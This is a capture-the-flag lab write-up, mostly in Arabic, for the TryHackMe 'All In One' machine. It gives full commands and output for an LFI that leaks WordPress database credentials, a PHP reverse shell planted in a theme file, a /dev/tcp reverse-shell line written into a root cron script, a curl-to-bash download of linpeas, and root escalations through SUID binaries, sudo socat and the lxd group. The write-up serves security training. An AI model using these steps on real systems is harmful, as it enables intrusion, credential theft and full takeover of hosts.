# All In One Write-Up ## Enumration ### RustScan : ``` rustscan -b 500 -a 10.10.130.232 OutPut: f4h3d@Cyber:~/ctf/thm/AllInOne$ rustscan -b 500 -a 10.10.130.232 .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : https://discord.gg/GFrQsGy : : https://github.com/RustScan/RustScan : -------------------------------------- Real hackers hack time ⌛ [~] The config file is expected to be at "/home/f4h3d/.rustscan.toml" [~] File limit higher than batch size. Can increase speed by increasing batch size '-b 924'. Open 10.10.130.232:21 Open 10.10.130.232:22 Open 10.10.130.232:80 ``` > > rustscan اداه سريعه جدا لفحص البورتات \ > > GitHub Page([RustScan](https://github.com/RustScan/RustScan)) ### Nmap Scan ``` sudo nmap -A -p 21,22,80 10.10.130.232 -oN nmap-scan OutPut : f4h3d@Cyber:~/ctf/thm/AllInOne$ sudo nmap -A -p 21,22,80 10.10.130.232 -oN nmap-scan [sudo] password for f4h3d: Starting Nmap 7.80 ( https://nmap.org ) at 2021-09-16 03:00 +03 Nmap scan report for 10.10.130.232 Host is up (0.11s latency). PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.8.161.67 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 2 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 e2:5c:33:22:76:5c:93:66:cd:96:9c:16:6a:b3:17:a4 (RSA) | 256 1b:6a:36:e1:8e:b4:96:5e:c6:ef:0d:91:37:58:59:b6 (ECDSA) |_ 256 fb:fa:db:ea:4e:ed:20:2b:91:18:9d:58:a0:6a:50:ec (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (92%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.9 (92%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 21/tcp) HOP RTT ADDRESS 1 124.24 ms 10.8.0.1 2 124.30 ms 10.10.130.232 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 15.92 seconds ``` > -A اختصار للامر -sC -sV -O --traceroute > > -oN لحفظ المخرجات داخل ملف #### FTP Enumration : من خلال فحص nmap اكتشفنا ان Anonymous login enabled ف نجرب ندخل على البورت ونتأكد من الملفات ``` ftp 10.10.130.232 f4h3d@Cyber:~/ctf/thm/AllInOne$ ftp 10.10.130.232 Connected to 10.10.130.232. 220 (vsFTPd 3.0.3) Name (10.10.130.232:f4h3d): Anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -la 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 2 0 115 4096 Oct 06 2020 . drwxr-xr-x 2 0 115 4096 Oct 06 2020 .. 226 Directory send OK. ftp> cd .. 250 Directory successfully changed. ftp> ls -la 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 2 0 115 4096 Oct 06 2020 . drwxr-xr-x 2 0 115 4096 Oct 06 2020 .. 226 Directory send OK. ``` > اكتشفنا هنا ان مافي ملفات حساسه على البورت ### HTTP Enumration : ![](https://3061301687-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjfpG5FuSH7q1_Jh3W3%2F-MjfpLT49xta4dykae4-%2F-Mjfvrkd0BTILjPBSWxg%2Fhttp.png?alt=media\&token=997feceb-806d-4abf-8780-c1111167cc1a) صفحه apache2 الإفتراضيه \ نبدأ نفحص المسارات بإستخدام اداه gobuster او اي اداه مفضله عندكم ``` gobuster -u http://10.10.130.232 -w /usr/share/DirBuster/directory-list-2.3-medium.txt -k -x php,txt -t 25 OutPut : f4h3d@Cyber:~/ctf/thm/AllInOne$ gobuster -u http://10.10.130.232 -w /usr/share/DirBuster/directory-list-2.3-medium.txt -k -x php,txt -t 25 ===================================================== Gobuster v2.0.1 OJ Reeves (@TheColonial) ===================================================== [+] Mode : dir [+] Url/Domain : http://10.10.130.232/ [+] Threads : 25 [+] Wordlist : /usr/share/DirBuster/directory-list-2.3-medium.txt [+] Status codes : 200,204,301,302,307,403 [+] Extensions : php,txt [+] Timeout : 10s ===================================================== 2021/09/16 03:26:27 Starting gobuster ===================================================== /wordpress (Status: 301) /hackathons (Status: 200) ``` > -u لتحديد الرابط \ > -w لتحديد مسار ملف التخمين \ > -k لتخطي شهاده ssl \ > -x للاضافات \ > -t لتحديد عدد الثريد او السرعه للتخمين
هنا اكتشفنا ان عندنا مسارين نبدأ نفحصهم ![الصفحه فاضيه ف نجرب نتصفح السورس ](https://3061301687-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjfpG5FuSH7q1_Jh3W3%2F-MjfwVUT85bkCXgv_g43%2F-Mjg00nfb2vobbI_ahqW%2FHackathon.png?alt=media\&token=a284b279-a55b-4778-bf2a-bf8fb1470cc8) ![](https://3061301687-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjfpG5FuSH7q1_Jh3W3%2F-MjgHdvq6AnC48K289bR%2F-MjghSwEQml1VVcxRjG2%2FScreenshot%20from%202021-09-16%2006-44-34.png?alt=media\&token=67920f78-7db7-4c55-99c3-22f4b3d310fb) #### هنا حصلنا كلام مشفر في اخر السورس كود والتلميح كان Vinegar == Vigenère cipher #### نستخدم موقع [cyberchef ](https://gchq.github.io/CyberChef/)لفك التشفير ![](https://3061301687-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjfpG5FuSH7q1_Jh3W3%2F-MjgHdvq6AnC48K289bR%2F-Mjgi_Ad9DxIIdxvN_3V%2FScreenshot_2.png?alt=media\&token=0d9ca7d9-7697-48a8-9d30-78319631827b) > هنا حصلنا باسوورد ف نخزنه عندنا ممكن نحتاجه بعدين : H\@ckme\@123 ![مسار wordpress عباره عن صفحه ووردربيس طبيعيه ](https://3061301687-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjfpG5FuSH7q1_Jh3W3%2F-MjfwVUT85bkCXgv_g43%2F-Mjg0VffmAGmFblIkj7k%2FWordpress.png?alt=media\&token=fb41933c-91ea-4e0b-a49b-7d16a3b1a0a2) > **من خلال الصوره قدرنا نحدد وحده من اليوزرات المستخدمه في وورد بريس : elyana** #### wpscan : > wpscan : احد اهم الادوات في فحص المواقع التي تستخدم wordpress ``` wpscan --url http://10.10.130.232/wordpress OutPut : f4h3d@Cyber:~/ctf/thm/AllInOne$ wpscan --url http://10.10.130.232/wordpress -->[snip]<-- [+] WordPress theme in use: twentytwenty | Location: http://10.10.130.232/wordpress/wp-content/themes/twentytwenty/ | Last Updated: 2021-07-22T00:00:00.000Z | Readme: http://10.10.130.232/wordpress/wp-content/themes/twentytwenty/readme.txt | [!] The version is out of date, the latest version is 1.8 | Style URL: http://10.10.130.232/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5 | Style Name: Twenty Twenty | Style URI: https://wordpress.org/themes/twentytwenty/ | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Css Style In Homepage (Passive Detection) | | Version: 1.5 (80% confidence) | Found By: Style (Passive Detection) | - http://10.10.130.232/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5, Match: 'Version: 1.5' [+] Enumerating All Plugins (via Passive Methods) [+] Checking Plugin Versions (via Passive and Aggressive Methods) [i] Plugin(s) Identified: [+] mail-masta | Location: http://10.10.130.232/wordpress/wp-content/plugins/mail-masta/ | Latest Version: 1.0 (up to date) | Last Updated: 2014-09-19T07:52:00.000Z | | Found By: Urls In Homepage (Passive Detection) | | Version: 1.0 (100% confidence) | Found By: Readme - Stable Tag (Aggressive Detection) | - http://10.10.130.232/wordpress/wp-content/plugins/mail-masta/readme.txt | Confirmed By: Readme - ChangeLog Section (Aggressive Detection) | - http://10.10.130.232/wordpress/wp-content/plugins/mail-masta/readme.txt [+] reflex-gallery | Location: http://10.10.130.232/wordpress/wp-content/plugins/reflex-gallery/ | Latest Version: 3.1.7 (up to date) | Last Updated: 2021-03-10T02:38:00.000Z | | Found By: Urls In Homepage (Passive Detection) | | Version: 3.1.7 (80% confidence) | Found By: Readme - Stable Tag (Aggressive Detection) | - http://10.10.130.232/wordpress/wp-content/plugins/reflex-gallery/readme.txt [+] Enumerating Config Backups (via Passive and Aggressive Methods) Checking Config Backups - Time: 00:00:04 <=====================> (137 / 137) 100.00% Time: 00:00:04 [i] No Config Backups Found. [!] No WPScan API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register ``` > هنا الاداه طلعت لنا اضافتين على الموقع مع اصداراتها ف نبدأ نبحث عنهم \ > mail-masta 1.0 \ > reflex-gallery 3.1.7 ![](https://3061301687-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjfpG5FuSH7q1_Jh3W3%2F-MjfwVUT85bkCXgv_g43%2F-Mjg7v5MeR87HUWOUBfG%2FMail-masta.png?alt=media\&token=07881aa8-eef5-4486-9043-a3d4a610b941) > الإضافه mail-masta مصابه بثغرتين : LFi , SQL injection \ > نبدأ بالإستغلال الاول [here](https://www.exploit-db.com/exploits/40290) ``` curl http://10.10.130.232/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd ``` > هنا تأكدنا ان الموقع او الاضافه مصابه ب LFi ف نحاول نستدعي ملف wp-config.php والسبب ان الملف في معظم الاوقات يحتوي على username , password \ > طبعا بحكم انه ملف php ف نحتاج نحوله ل base64 عشان م يتنفذ
``` curl http://10.10.130.232/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=php://filter/convert.base64-encode/resource=../../../../../wp-config.php | base64 -d OutPut : -->[snip]<-- // ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'wordpress' ); /** MySQL database username */ define( 'DB_USER', 'elyana' ); /** MySQL database password */ define( 'DB_PASSWORD', 'H@ckme@123' ); /** MySQL hostname */ define( 'DB_HOST', 'localhost' ); /** Database Charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8mb4' ); /** The Database Collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); -->[snip]<-- ``` > هنا قدرنا نوصل لليوزر والباس : \ > elyana : H\@ckme\@123 #### نحاول ندخل على الجهاز باستخدام ssh بالمعلومات ``` ssh elyana@10.10.130.232 OutPut : f4h3d@Cyber:~/ctf/thm/AllInOne$ ssh elyana@10.10.130.232 The authenticity of host '10.10.130.232 (10.10.130.232)' can't be established. ECDSA key fingerprint is SHA256:IVzQLYHc196APvwnH40vFHjOR4ZsfNqxHnOG3HuzXgg. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.130.232' (ECDSA) to the list of known hosts. elyana@10.10.130.232's password: Permission denied, please try again. elyana@10.10.130.232's password: Permission denied, please try again. elyana@10.10.130.232's password: ``` > هنا م قدرنا ندخل على الجهاز , مافي بورت لخدمه mysql ف اخر مكان نجرب فيه المعلومات هو الموقع ![](https://3061301687-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjfpG5FuSH7q1_Jh3W3%2F-MjfwVUT85bkCXgv_g43%2F-MjgCIbtQfU9aFyod9_w%2FLogin%20page.png?alt=media\&token=c5ff5b29-d8aa-41cd-a185-6ee72d5a194c) ![هنا قدرنا ندخل على حساب elyana ](https://3061301687-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjfpG5FuSH7q1_Jh3W3%2F-MjfwVUT85bkCXgv_g43%2F-MjgCLxm9Z5nk1lVkNX8%2Femail%20verify.png?alt=media\&token=2d52000c-ada7-4d1f-9685-a44d9fa589f3) ![](https://3061301687-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjfpG5FuSH7q1_Jh3W3%2F-MjfwVUT85bkCXgv_g43%2F-MjgCUjoj1X-Rdcpg3mD%2Fadmin%20panel.png?alt=media\&token=765318ea-e2e2-4453-aba5-d4253c9180cd) > قدرنا ندخل على Admin panel الخطوه الثانيه نحاول نجيب شل على الجهاز ## Getting foothold : ![](https://3061301687-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjfpG5FuSH7q1_Jh3W3%2F-MjfwVUT85bkCXgv_g43%2F-MjgDJWWbbXZUaOvTTdS%2FScreenshot%20from%202021-09-16%2004-29-14.png?alt=media\&token=534c001b-c6ed-4d41-a172-0487ac76288a) > هنا قدرنا نعدل على احد الملفات ف نستخدم [pentestmonkey reverse shell](https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php) \ > ونعدل IP , Port داخل الشل
![](https://3061301687-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjfpG5FuSH7q1_Jh3W3%2F-MjgDm4fQ8KiUZP-L_Q3%2F-MjgEoE7V3KuilY1FDPA%2FScreenshot_8.png?alt=media\&token=ac78d2c6-aff2-4b56-aa46-893bd5a2c42b) > نتأكد من تغيير البورت والايبي ونحفظ الملف Update File
``` nc -lnvp 9111 # عشان يجينا اتصال من الشل curl http://10.10.130.232/wordpress/wp-content/themes/twentytwenty/404.php #نرسل ريكويست للصفحه اللي اضفنا عليها الشل ``` ![Reverse Shell #Done ](https://3061301687-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjfpG5FuSH7q1_Jh3W3%2F-MjgDm4fQ8KiUZP-L_Q3%2F-MjgFsQ0Bcf3c3hOrLLV%2FScreenshot%20from%202021-09-16%2004-40-13.png?alt=media\&token=a9f937e3-f5ff-450c-80df-8c7feb5b585c) > بعد م جبنا جلسه على الجهاز نحتاج نعدل الشل ونخليه interactive ``` python3 -c 'import pty;pty.spawn("/bin/bash")' ^Z # تطلع من الشل stty raw -echo ; fg بنرجع للشل بعد هذا الامر export TERM=xterm # بكذا عدلنا الشل ``` ### ‌Privilege Escalation #### هنا في هذي المشين عندنا اكثر من طريقه لرفع الصلاحيات ف بنستكشفها كلها ان شاء الله ``` sudo python3 -m http.server 80 #نفتح http port على جهازنا curl http://10.8.161.67/linpeas.sh | bash # ننزل اداه linpeas ونشغلها ``` ### PrivEsc 1 : crontab ``` linpeas output : SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin * * * * * root /var/backups/script.sh bash-4.4$ ls -la /var/backups/script.sh -rwxrwxrwx 1 root root 73 Oct 7 2020 /var/backups/script.sh bash-4.4$ cat /var/backups/script.sh #!/bin/bash #Just a test script, might use it later to for a cron task bash-4.4$ cat /etc/crontab -->[snip]<-- SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) * * * * * root /var/backups/script.sh #We have write permissions so let's edit the file and start a new netcat listener echo 'bash -c "bash -i >& /dev/tcp/10.8.161.67/9112 0>&1"' > /var/backups/script.sh ``` ![Rooted Successfully](https://3061301687-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjfpG5FuSH7q1_Jh3W3%2F-MjgHdvq6AnC48K289bR%2F-MjgQdEqamgt8y3XRpuk%2FScreenshot%20from%202021-09-16%2005-27-03.png?alt=media\&token=227809ea-4b36-487b-939c-3b3556120d4e) ### PrivEsc 2 : SUID ``` linpeas.sh output : ════════════════════════════════════╣ Interesting Files ╠════════════════════════════════════ ╔══════════╣ SUID - Check easy privesc, exploits and write perms ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid strings Not Found -rwsr-sr-x 1 root root 1.1M Jun 6 2019 /bin/bash -rwsr-sr-x 1 root root 59K Jan 18 2018 /bin/chmod -rwsr-xr-x 1 root root 99K Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic -rwsr-sr-x 1 root root 11M Nov 23 2018 /usr/bin/lxc (Unknown SUID binary) -rwsr-sr-x 1 root root 392K Apr 4 2018 /usr/bin/socat #Default SUID binaries snipped ! ``` > موقع [GTFOBins ](https://gtfobins.github.io/)يفيدنا كثير في حال حصلنا اي binary بصلاحيات خاطئه لرفع الصلاحيات #### Bash SUID : ![Rooted by bash binary ](https://3061301687-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjfpG5FuSH7q1_Jh3W3%2F-MjgHdvq6AnC48K289bR%2F-MjgTp5fvibazaxO--aB%2FScreenshot_1.png?alt=media\&token=a8760e82-eaae-459c-8c9f-ff7ded75c09a) #### Chmod SUID : > هنا مافي طريقه نقدر نرفع صلاحياتنا منها لكن نقدر نغير صلاحيات الملفات مثل /etc/shadow , او نغير صلاحيات /bin/bash ل suid وبكذا نقدر نجيب الرووت ### PrivEsc 3 : Escalate our privileges to elyana ``` cd /home/elyana ls -la drwxr-xr-x 6 elyana elyana 4096 Oct 7 2020 . drwxr-xr-x 3 root root 4096 Oct 5 2020 .. -rw------- 1 elyana elyana 1632 Oct 7 2020 .bash_history -rw-r--r-- 1 elyana elyana 220 Apr 4 2018 .bash_logout -rw-r--r-- 1 elyana elyana 3771 Apr 4 2018 .bashrc drwx------ 2 elyana elyana 4096 Oct 5 2020 .cache drwxr-x--- 3 root root 4096 Oct 5 2020 .config drwx------ 3 elyana elyana 4096 Oct 5 2020 .gnupg drwxrwxr-x 3 elyana elyana 4096 Oct 5 2020 .local -rw-r--r-- 1 elyana elyana 807 Apr 4 2018 .profile -rw-r--r-- 1 elyana elyana 0 Oct 5 2020 .sudo_as_admin_successful -rw-rw-r-- 1 elyana elyana 59 Oct 6 2020 hint.txt -rw------- 1 elyana elyana 61 Oct 6 2020 user.txt # we got a hint and user.txt file bash-4.4$ cat hint.txt Elyana's user password is hidden in the system. Find it ;) bash-4.4$ find / -user elyana 2>/dev/null /home/elyana /home/elyana/.local /home/elyana/.local/share /home/elyana/.cache /home/elyana/user.txt /home/elyana/.gnupg /home/elyana/.bash_logout /home/elyana/hint.txt /home/elyana/.bash_history /home/elyana/.profile /home/elyana/.sudo_as_admin_successful /home/elyana/.bashrc /etc/mysql/conf.d/private.txt bash-4.4$ cat /etc/mysql/conf.d/private.txt user: elyana password: E@syR18ght #SSH credetials ``` > وهنا حصلنا مساعده محتواها ان الباسوورد مخبأ داخل النظام ف استخدمنا امر find وحددنا اليوزر elyana \ > لقينا الملف ومحتواه اليوزر والباس ; نجرب ندخل SSH بنفس المعلومات ![وبهنا قدرنا نوصل لليوزر elyana ](https://3061301687-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjfpG5FuSH7q1_Jh3W3%2F-MjgHdvq6AnC48K289bR%2F-Mjg_h5CSO8Z0xYjRJoS%2FScreenshot%20from%202021-09-16%2006-11-25.png?alt=media\&token=9ce0b055-85bf-45bb-97ca-e8122ea66f48) ### ‌PrivEsc 4 : from elyana to root اول شي نبدأ فيه دام معنا الباس sudu -l ونتأكد اذا كان مسموح لنا نشغل اي اداه باستخدام يوزر الروت ``` -bash-4.4$ sudo -l Matching Defaults entries for elyana on elyana: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User elyana may run the following commands on elyana: (ALL) NOPASSWD: /usr/bin/socat ``` > نقدر نشغل socat بيوزر الروت \ > socat اداه مشابهه ل netcat ف نرجع لموقعنا [GTFOBins](https://gtfobins.github.io/) ``` -bash-4.4$ sudo socat stdin exec:/bin/sh id uid=0(root) gid=0(root) groups=0(root) whoami root ``` ### PrivEsc 5 : from elyana to root #2 ``` -bash-4.4$ id uid=1000(elyana) gid=1000(elyana) groups=1000(elyana),4(adm),27(sudo),108(lxd) #elyana part of lxd group ``` > نبدأ باخر طريقه لرفع الصلاحيات مثل م شفنا elyana جزء من قروب lxd ف نحاول نرفع صلاحياتنا منه \ > [LXD PrivEsc](https://www.hackingarticles.in/lxd-privilege-escalation/) هذا الموقع اللي استعين فيه وقت اقابل هذا التكنيك ف نبدأ نمشي خطوه خطوه معه ``` git clone https://github.com/saghul/lxd-alpine-builder.git cd lxd-alpine-builder sudo ./build-alpine f4h3d@Cyber:~/tools/lxd-alpine-builder$ ls alpine-v3.14-x86_64-20210916_0624.tar.gz build-alpine LICENSE README.md انقل الملف الجديد .tar.gz للمسار اللي تشتغل عليه كمثال mv alpine-v3.14-x86_64-20210916_0624.tar.gz ~/ctf/thm/AllInOne الان نفتح سيرفر http باستخدام بايثون sudo python3 -m http.server 80 ننتقل ل elyana -bash-4.4$ cd /tmp -bash-4.4$ wget http://10.8.161.67/alpine-v3.14-x86_64-20210916_0624.tar.gz نزلنا الملف وحفظناه # الأمر الاول lxc image import ./alpine-v3.14-x86_64-20210916_0624.tar.gz --alias myimage الامر الثاني lxc image list الامر الثالث lxc init myimage ignite -c security.privileged=true الامر الرابع lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true الامر الخامس lxc start ignite الامر السادس lxc exec ignite /bin/sh ``` ![Rooted via lxd technique ](https://3061301687-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjfpG5FuSH7q1_Jh3W3%2F-MjgHdvq6AnC48K289bR%2F-MjgfAx8zDhklp-mYEgR%2FScreenshot%20from%202021-09-16%2006-35-23.png?alt=media\&token=84033ee7-42fb-45a8-a4a6-ef8f7ba70a99) ``` cat /mnt/root/root/root.txt ; cat /mnt/root/home/elyana/user.txt Flags ```